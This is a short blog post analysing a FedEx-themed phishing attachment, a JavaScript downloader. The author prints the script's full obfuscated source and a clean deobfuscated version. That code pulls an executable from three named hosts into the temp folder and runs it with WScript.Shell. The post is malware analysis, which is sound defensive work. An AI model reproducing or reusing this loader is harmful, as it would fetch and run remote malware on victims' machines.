Script kiddies

Today, I got an email to my findmyparcel marketing email address. It was like below,

Dear Customer,

This is to confirm that one or more of your parcels has been shipped.
Please, open email attachment to print shipment label.

Thank you for choosing FedEx,
Thomas Barlow,
FedEx Operation Manager.

First I thought maybe some user entered wrong email and I was about to delete it. Then I looked at email address thomas.barlow@chanchan.wperu.com Yeah right it definitely looks like email address of FedEx Operation Manager. I decided to check what it is just for fun. We open the zip file and we have this file;

Delivery_Notification_00000301441.doc.js

I guess our script kiddie want me to double click that file. Let’s not do that and check what is inside the file.

var str="5557515E020D0A00091D14051607010824091117100502050011164A070B09";function xirf317018() { return 'ject('; }; function xirf534300() { return ' { '; }; function xirf359762() { return 'tech'; }; function xirf598416() { return ' ws.'; }; /* var x=xirf980271(); */ function xirf584168() { return '(fn'; }; function xirf559234() { return 'n ='; }; /* var x=xirf562393(); */ /* var x=xirf105198(); */ /* var x=xirf353489(); */ function xirf210158() { return 'MP%"'; }; function xirf46306() { return 'm a1'; }; function xirf655408() { return '; tr'; }; function xirf740896() { return '.sen'; }; function xirf149604() { return 'Obje'; }; function xirf320580() { return '"M'; }; function xirf445250() { return 'veXOb'; }; function xirf231530() { return 'ode('; }; /* var x=xirf975866(); */ function xirf512928() { return 'Body)'; }; function xirf580606() { return 'ile'; }; /* var x=xirf819551(); */ /* var x=xirf219377(); */ function xirf146042() { return 'veX'; }; function xirf523614() { return 'size '; }; function xirf815698() { return '(3373'; }; /* var x=xirf582230(); */ /* var x=xirf410993(); */ /* var x=xirf356760(); */ function xirf185224() { return 'Exp'; }; function xirf762268() { return ' if ('; }; function xirf21372() { return ' var'; }; /* var x=xirf896113(); */ /* var x=xirf391280(); */ /* var x=xirf732917(); */ /* var x=xirf369494(); */ function xirf591292() { return ' t'; }; /* var x=xirf390258(); */ /* var x=xirf969816(); */ function xirf527176() { return '> '; }; /* var x=xirf394783(); */ function xirf577044() { return 'oF'; }; /* var x=xirf483034(); */ /* var x=xirf209762(); */ function xirf142480() { return 'Acti'; }; function xirf39182() { return 'now'; }; function xirf199472() { return 'Strin'; }; /* var x=xirf244315(); */ /* var x=xirf686414(); */ /* var x=xirf862515(); */ /* var x=xirf286189(); */ function xirf455936() { return 'B.Str'; }; /* var x=xirf165805(); */ function xirf203034() { return 'gs'; }; function xirf213720() { return ')+Str'; }; /* var x=xirf679874(); */ function xirf420316() { return 'us =='; }; /* var x=xirf198241(); */ /* var x=xirf581270(); */ /* var x=xirf854046(); */ function xirf174538() { return 'r f'; }; function xirf708838() { return 'fr+'; }; /* var x=xirf282941(); */ function xirf92612() { return ' ")'; }; function xirf626912() { return ' {'; }; function xirf292084() { return '= 0; '; }; function xirf220844() { return 'fr'; }; /* var x=xirf286314(); */ function xirf309894() { return 'ctiv'; }; /* var x=xirf970989(); */ /* var x=xirf596384(); */ function xirf327704() { return '.X'; }; /* var x=xirf790806(); */ function xirf96174() { return '; for'; }; function xirf413192() { return 'o.'; }; /* var x=xirf211360(); */ /* var x=xirf228456(); */ /* var x=xirf962983(); */ /* var x=xirf597292(); */ /* var x=xirf505582(); */ function xirf74802() { return 'etic'; }; function xirf349076() { return 're'; }; /* var x=xirf385182(); */ /* var x=xirf199423(); */ function xirf694590() { return 'en'; }; function xirf110422() { return 'i<b'; }; /* var x=xirf225853(); */ function xirf192348() { return 'viro'; }; function xirf790764() { return '; '; }; function xirf281398() { return '"; va'; }; /* var x=xirf969798(); */ /* var x=xirf381112(); */ function xirf726648() { return ' fal'; }; /* var x=xirf264375(); */ /* var x=xirf491134(); */ /* var x=xirf962806(); */ function xirf299208() { return ' xo'; }; function xirf470184() { return 'op'; }; /* var x=xirf782648(); */ function xirf277836() { return '.exe'; }; function xirf801450() { return ' d'; }; function xirf121108() { return 'i++'; }; function xirf484432() { return 'e = 1'; }; /* var x=xirf768019(); */ /* var x=xirf491251(); */ function xirf548548() { return 'a.po'; }; /* var x=xirf255049(); */ /* var x=xirf167838(); */ function xirf537862() { return 'dn'; }; /* var x=xirf491655(); */ /* var x=xirf547718(); */ /* var x=xirf521030(); */ /* var x=xirf915279(); */ /* var x=xirf733400(); */ function xirf17810() { return ' {'; }; function xirf245778() { return 'd('; }; /* var x=xirf867379(); */ /* var x=xirf851681(); */ function xirf113984() { return '.len'; }; /* var x=xirf267316(); */ /* var x=xirf796612(); */ function xirf758706() { return ' {};'; }; function xirf163852() { return 't.Sh'; }; function xirf634036() { return '}; '; }; function xirf780078() { return 'k;'; }; /* var x=xirf886372(); */ function xirf3562() { return 'funct'; }; /* var x=xirf411161(); */ /* var x=xirf770704(); */ function xirf274274() { return '0)+"'; }; /* var x=xirf474969(); */ function xirf124670() { return ') '; }; /* var x=xirf274802(); */ /* var x=xirf981930(); */ /* var x=xirf482107(); */ /* var x=xirf217746(); */ function xirf644722() { return 'se('; }; /* var x=xirf965151(); */ /* var x=xirf861108(); */ function xirf341952() { return 'o.'; }; function xirf242216() { return '.roun'; }; function xirf562796() { return ' 0'; }; function xirf438126() { return 'ew'; }; function xirf441688() { return ' Acti'; }; /* var x=xirf807747(); */ /* var x=xirf568040(); */ /* var x=xirf117020(); */ function xirf808574() { return '4892)'; }; function xirf480870() { return 'a.typ'; }; /* var x=xirf137425(); */ function xirf605540() { return 'fn,1,'; }; /* var x=xirf141289(); */ function xirf243() { return 'eval'; };  function xirf10686() { return 'dl(f'; }; /* var x=xirf830221(); */ /* var x=xirf709589(); */ /* var x=xirf564031(); */ function xirf509366() { return 'se'; }; function xirf751582() { return 'tch'; }; /* var x=xirf294385(); */ function xirf797888() { return '31);'; }; function xirf295646() { return 'var'; }; /* var x=xirf853755(); */ /* var x=xirf399699(); */ /* var x=xirf761370(); */ /* var x=xirf484679(); */ function xirf81926() { return 'om"'; }; function xirf755144() { return ' (er)'; }; function xirf776516() { return 'ea'; }; /* var x=xirf910394(); */ function xirf794326() { return 'dl(57'; }; /* var x=xirf895383(); */ /* var x=xirf751068(); */ /* var x=xirf215107(); */ /* var x=xirf845211(); */ /* var x=xirf523342(); */ /* var x=xirf517439(); */ /* var x=xirf135611(); */ /* var x=xirf305502(); */ /* var x=xirf315279(); */ /* var x=xirf328987(); */ function xirf370448() { return 'uncti'; }; /* var x=xirf433343(); */ /* var x=xirf322148(); */ function xirf520052() { return ' (xa.'; }; /* var x=xirf710953(); */ /* var x=xirf131654(); */ /* var x=xirf420061(); */ function xirf473746() { return 'en('; }; /* var x=xirf673468(); */ /* var x=xirf712261(); */ function xirf288522() { return 'dn '; }; /* var x=xirf646149(); */ function xirf662532() { return ' xo.o'; }; function xirf270712() { return '00000'; }; /* var x=xirf469659(); */ /* var x=xirf153340(); */ /* var x=xirf522896(); */ /* var x=xirf411414(); */ function xirf630474() { return '}; '; }; function xirf252902() { return 'ra'; }; /* var x=xirf425783(); */ function xirf544986() { return ' 1; x'; }; function xirf744458() { return 'd();'; }; function xirf819260() { return ');'; }; function xirf138918() { return 'new '; }; function xirf103298() { return 'var '; }; function xirf42744() { return '.co'; }; /* var x=xirf753708(); */ /* var x=xirf393386(); */ /* var x=xirf661677(); */ /* var x=xirf440064(); */ function xirf516490() { return '; if'; }; /* var x=xirf667133(); */ /* var x=xirf687932(); */ /* var x=xirf344194(); */ function xirf338390() { return '"); x'; }; /* var x=xirf946301(); */ /* var x=xirf587838(); */ function xirf434564() { return 'a = n'; }; function xirf452374() { return '"ADOD'; }; function xirf569920() { return 'xa.s'; }; function xirf28496() { return '"id'; }; /* var x=xirf939410(); */ function xirf334828() { return 'TTP'; }; function xirf89050() { return 't("'; }; function xirf669656() { return 'GE'; }; function xirf612664() { return ' }'; }; function xirf805012() { return 'l('; }; function xirf730210() { return 'se'; }; function xirf409630() { return '& x'; }; /* var x=xirf874745(); */ /* var x=xirf188421(); */ /* var x=xirf816533(); */ /* var x=xirf397395(); */ function xirf431002() { return 'ar x'; }; /* var x=xirf664167(); */ /* var x=xirf772626(); */ /* var x=xirf839624(); */ function xirf53430() { return 'ic'; }; /* var x=xirf622998(); */ /* var x=xirf632817(); */ /* var x=xirf658429(); */ /* var x=xirf579000(); */ function xirf313456() { return 'eXOb'; }; /* var x=xirf762658(); */ var x = ''; /* var x=xirf818842(); */ function xirf502242() { return '.Re'; }; function xirf398944() { return 'e =='; }; /* var x=xirf156838(); */ /* var x=xirf588298(); */ /* var x=xirf832829(); */ function xirf384696() { return '(xo.r'; }; function xirf637598() { return 'xa'; }; /* var x=xirf857774(); */ function xirf459498() { return 'eam")'; }; /* var x=xirf907658(); */ /* var x=xirf463741(); */ function xirf260026() { return 'om('; }; /* var x=xirf444379(); */ function xirf56992() { return 'e.net'; }; /* var x=xirf875856(); */ /* var x=xirf593438(); */ /* var x=xirf833110(); */ function xirf24934() { return ' b = '; }; function xirf573482() { return 'aveT'; }; /* var x=xirf771777(); */ function xirf737334() { return 'xo'; }; /* var x=xirf725214(); */ /* var x=xirf906715(); */ function xirf395382() { return 'at'; }; function xirf541424() { return ' ='; }; function xirf181662() { return ' ws.'; }; function xirf7124() { return 'ion '; }; /* var x=xirf150565(); */ /* var x=xirf629534(); */ /* var x=xirf496983(); */ function xirf648284() { return ');'; }; function xirf715962() { return 'd="'; }; function xirf719524() { return '+st'; }; /* var x=xirf377729(); */ function xirf374010() { return 'on() '; }; function xirf235092() { return '92)'; }; /* var x=xirf736087(); */ /* var x=xirf682033(); */ function xirf170976() { return '; va'; }; /* var x=xirf841753(); */ /* var x=xirf883225(); */ function xirf67678() { return 'ibras'; }; function xirf555672() { return 'io'; }; function xirf331266() { return 'MLH'; }; /* var x=xirf219027(); */ /* var x=xirf242528(); */ function xirf623350() { return ' (er)'; }; /* var x=xirf617417(); */ /* var x=xirf297986(); */ /* var x=xirf939382(); */ /* var x=xirf175917(); */ function xirf135356() { return ' = '; }; function xirf491556() { return 'xa.wr'; }; function xirf448812() { return 'ject('; }; /* var x=xirf564242(); */ function xirf352638() { return 'ad'; }; function xirf99736() { return ' ('; }; function xirf391820() { return 'ySt'; }; function xirf324142() { return 'SXML2'; }; function xirf263588() { return ')*1'; }; function xirf249340() { return 'Math.'; }; /* var x=xirf992112(); */ /* var x=xirf438590(); */ /* var x=xirf877591(); */ function xirf609102() { return '0);'; }; function xirf566358() { return '; '; }; /* var x=xirf478884(); */ function xirf377572() { return '{ '; }; /* var x=xirf420926(); */ function xirf765830() { return 'dn '; }; function xirf227968() { return 'harC'; }; /* var x=xirf437251(); */ /* var x=xirf367852(); */ function xirf587730() { return ',2);'; }; /* var x=xirf747740(); */ function xirf366886() { return 'e = f'; }; function xirf71240() { return 'int'; }; function xirf748020() { return ' } ca'; }; /* var x=xirf369017(); */ function xirf427440() { return ') { v'; }; /* var x=xirf405054(); */ /* var x=xirf805549(); */ /* var x=xirf611391(); */ function xirf156728() { return '("WS'; }; /* var x=xirf878107(); */ function xirf49868() { return 'serv'; }; function xirf687466() { return '"/d'; }; /* var x=xirf407440(); */ function xirf160290() { return 'crip'; }; function xirf256464() { return 'nd'; }; function xirf306332() { return 'w A'; }; /* var x=xirf807143(); */ /* var x=xirf917956(); */ function xirf466622() { return 'xa.'; }; function xirf153166() { return 'ct'; }; /* var x=xirf671527(); */ /* var x=xirf195283(); */ /* var x=xirf956190(); */ function xirf167414() { return 'ell")'; }; function xirf787202() { return ' }'; }; function xirf658970() { return 'y {'; }; function xirf60554() { return ' www'; }; function xirf712400() { return '"&i'; }; /* var x=xirf729384(); */ function xirf117546() { return 'gth; '; }; function xirf733772() { return '); '; }; function xirf705276() { return 'd="+'; }; /* var x=xirf957005(); */ /* var x=xirf549186(); */ /* var x=xirf273114(); */ function xirf178100() { return 'n ='; }; /* var x=xirf263855(); */ function xirf416754() { return 'stat'; }; function xirf238654() { return '+Math'; }; /* var x=xirf367986(); */ function xirf616226() { return ' cat'; }; /* var x=xirf720673(); */ /* var x=xirf535352(); */ /* var x=xirf789260(); */ function xirf128232() { return '{ v'; }; /* var x=xirf583916(); */ function xirf698152() { return 't.ph'; }; function xirf683904() { return 'b[i]+'; }; /* var x=xirf351150(); */ /* var x=xirf932345(); */ function xirf217282() { return 'ing.'; }; /* var x=xirf735013(); */ /* var x=xirf879417(); */ /* var x=xirf552619(); */ /* var x=xirf620595(); */ function xirf388258() { return 'ead'; }; /* var x=xirf523612(); */ function xirf619788() { return 'ch'; }; function xirf651846() { return ' }; }'; }; function xirf64116() { return '.f'; }; /* var x=xirf142116(); */ /* var x=xirf176209(); */ function xirf35620() { return 'ed'; }; function xirf78364() { return 'afm.c'; }; function xirf14248() { return 'r)'; }; function xirf691028() { return 'ocum'; }; /* var x=xirf338298(); */ function xirf769392() { return '== '; }; function xirf487994() { return '; '; }; /* var x=xirf225206(); */ function xirf402506() { return ' 4'; }; /* var x=xirf636674(); */ /* var x=xirf636282(); */ /* var x=xirf836817(); */ function xirf812136() { return '; dl'; }; function xirf267150() { return '00'; }; /* var x=xirf155738(); */ function xirf641160() { return '.clo'; }; function xirf356200() { return 'ysta'; }; function xirf195910() { return 'nment'; }; function xirf772954() { return '1) br'; }; function xirf131794() { return 'ar ws'; }; /* var x=xirf137927(); */ function xirf495118() { return 'ite('; }; function xirf106860() { return 'i=0; '; }; /* var x=xirf196136(); */ /* var x=xirf725959(); */ /* var x=xirf328080(); */ /* var x=xirf194010(); */ /* var x=xirf246259(); */ function xirf32058() { return 'secur'; }; function xirf505804() { return 'spon'; }; function xirf406068() { return ' &'; }; /* var x=xirf305409(); */ /* var x=xirf794086(); */ /* var x=xirf185017(); */ function xirf224406() { return 'omC'; }; /* var x=xirf661559(); */ /* var x=xirf267063(); */ /* var x=xirf124701(); */ /* var x=xirf675004(); */ /* var x=xirf792550(); */ /* var x=xirf573393(); */ /* var x=xirf887064(); */ function xirf477308() { return '); x'; }; /* var x=xirf519510(); */ function xirf673218() { return 'T","'; }; function xirf498680() { return 'xo'; }; /* var x=xirf671072(); */ /* var x=xirf970843(); */ function xirf423878() { return ' 200'; }; function xirf701714() { return 'p?rn'; }; /* var x=xirf784083(); */ function xirf363324() { return 'ang'; }; /* var x=xirf693928(); */ function xirf188786() { return 'andEn'; }; /* var x=xirf249099(); */ /* var x=xirf126979(); */ function xirf680342() { return '//"+'; }; function xirf345514() { return 'on'; }; function xirf666094() { return 'pen("'; }; function xirf783640() { return ' };'; }; function xirf381134() { return 'if '; }; /* var x=xirf421675(); */ function xirf601978() { return 'Run('; }; function xirf676780() { return 'http:'; }; function xirf723086() { return 'r,'; }; function xirf284960() { return 'r '; }; /* var x=xirf248031(); */ /* var x=xirf871734(); */ function xirf530738() { return '5000)'; }; function xirf552110() { return 'sit'; }; /* var x=xirf871627(); */ function xirf594854() { return 'ry {'; }; function xirf302770() { return ' = ne'; }; /* var x=xirf277826(); */ function xirf206596() { return '("%TE'; }; function xirf463060() { return '; '; }; function xirf85488() { return '.spli'; };for (var fzdr=1; fzdr<=230; fzdr++) { x += this['xirf'+(fzdr*3562)](); }; this[xirf243()](x);
 

Wohoooo!!!! Our guy knows how to obfuscate javascript. Let’s deobfuscate it.

function dl(fr){
  var b = "idsecurednow.com a1service.net www.fibrasinteticafm.com".split(" ");
  for (var i = 0; i < b.length; i ++ ){ var ws = new ActiveXObject("WScript.Shell"); var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + Math.round( Math.random() * 100000000) + ".exe"; var dn = 0; var xo = new ActiveXObject("MSXML2.XMLHTTP"); xo.onreadystatechange = function (){ if (xo.readyState == 4 && xo.status == 200){ var xa = new ActiveXObject("ADODB.Stream"); xa.open(); xa.type = 1; xa.write(xo.ResponseBody); if (xa.size > 5000){
          dn = 1;
          xa.position = 0;
          xa.saveToFile(fn, 2);
          try {
            ws.Run(fn, 1, 0);
          }
          catch (er){
          }
          ;
        }
        ;
        xa.close();
      }
      ;
    }
    ;
    try {
      xo.open("GET", "http://" + b[i] + "/document.php?rnd=" + fr + "&id=" + str, false);
      xo.send();
    }
    catch (er){
    }
    ;
    if (dn == 1)break ;
  }
  ;
}
;
dl(5731);
dl(4892);
dl(3373);
 

It is classic javascript downloader. It basically tries to download malware from three different addresses and run it. It is a new version because according to Virustotal  it was just checked 8 hours ago probably by our malware author. I am flattered that someone coded a malware just to attack me. I checked the file and it is coded in Visual Basic. I won’t analyze the file and waste my time with it. Just some string greps shows that it is probably coded by some German person. If malware author reads this, please tell me what was your motive. Last time I checked, I am not a celebrity, don’t have billions of dollar or anything valuable to be exploited.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s